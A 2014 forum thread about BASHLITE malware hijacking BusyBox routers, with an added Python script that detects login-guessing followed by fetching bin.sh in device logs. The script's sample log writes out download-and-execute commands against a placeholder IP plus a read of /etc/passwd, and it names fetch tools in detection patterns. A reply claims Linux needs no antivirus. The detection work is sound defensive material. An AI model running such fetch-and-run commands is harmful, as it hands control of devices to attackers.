
BASHLITE Affects Devices Running on BusyBox



#1 NickAu


Posted 17 November 2014 - 02:53 PM

 

We have continuously monitored this vulnerability and, in our latest research, we observed that recent samples of BASHLITE (detected by Trend Micro as ELF_BASHLITE.SMB) scan the network for devices/machines running on BusyBox, and log in using a set of usernames and passwords (see figure 4 below). Once a connection is established, it runs the command to download and run bin.sh and bin2.sh scripts, gaining control over the BusyBox system.

BusyBox is built on top of the Linux kernel and is used by small devices such as routers. Remote attackers can possibly maximize their control over affected devices by deploying other components or malicious software into the system depending on their motive. This is seen in the following commands:

BASHLITE Affects Devices Running on BusyBox
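The behaviour quoted in the post above (credential guessing against a BusyBox device, then fetching and running bin.sh and bin2.sh) can be hunted for in device login and command logs. The following is an added example, not part of the original post or of Trend Micro's write-up; the log format, the list of fetch tools, and the sample lines (documentation-range IPs) are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample log. Assumed format: "<time> <src_ip> <EVENT> <detail>"
SAMPLE_LOG = """\
02:14:01 198.51.100.7 LOGIN_FAIL root
02:14:02 198.51.100.7 LOGIN_FAIL admin
02:14:03 198.51.100.7 LOGIN_OK root
02:14:05 198.51.100.7 CMD cd /tmp && wget http://203.0.113.9/bin.sh && sh bin.sh
02:14:09 198.51.100.7 CMD wget http://203.0.113.9/bin2.sh; sh bin2.sh
09:30:11 192.0.2.20 LOGIN_OK admin
09:30:40 192.0.2.20 CMD ls /bin
09:31:02 192.0.2.20 CMD cat /etc/passwd
"""

# Script names come from the post; the lookbehind avoids hits such as "mybin.sh".
SCRIPT_RE = re.compile(r"(?<![\w.-])bin2?\.sh\b")
# Assumption: download tools commonly present on embedded Linux systems.
FETCH_RE = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b")


def find_bashlite_like_sessions(log_text):
    """Return {src_ip: {"failed_logins": n, "scripts": [...]}} for sources that
    logged in and then issued a command fetching bin.sh or bin2.sh."""
    sessions = defaultdict(
        lambda: {"fails": 0, "logged_in": False, "scripts": set()})
    for line in log_text.splitlines():
        parts = line.split(None, 3)
        if len(parts) != 4:
            continue  # skip malformed or empty lines
        _time, src, event, detail = parts
        s = sessions[src]
        if event == "LOGIN_FAIL" and not s["logged_in"]:
            s["fails"] += 1  # guesses made before the first success
        elif event == "LOGIN_OK":
            s["logged_in"] = True
        elif event == "CMD" and s["logged_in"] and FETCH_RE.search(detail):
            s["scripts"].update(SCRIPT_RE.findall(detail))
    return {src: {"failed_logins": s["fails"], "scripts": sorted(s["scripts"])}
            for src, s in sessions.items() if s["scripts"]}


if __name__ == "__main__":
    for src, info in find_bashlite_like_sessions(SAMPLE_LOG).items():
        print(src, info)
```
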




 


#2 bmike1


Posted 17 November 2014 - 03:19 PM

Thanks for this. I just changed username/password.


A/V Software? I don't need A/V software. I've run Linux since '98 w/o A/V software and have never had a virus. I never even had a firewall until '01 when I began to get routers with firewalls pre-installed. With Linux, if a vulnerability is detected a fix is quickly found and then upon your next update the vulnerability is patched. If you must worry about viruses on a Linux system, only worry about them in the sense that you can infect a Windows user. I recommend Linux Mint or, if you need a lighter weight operating system that fits on a CD, MX14 or AntiX.




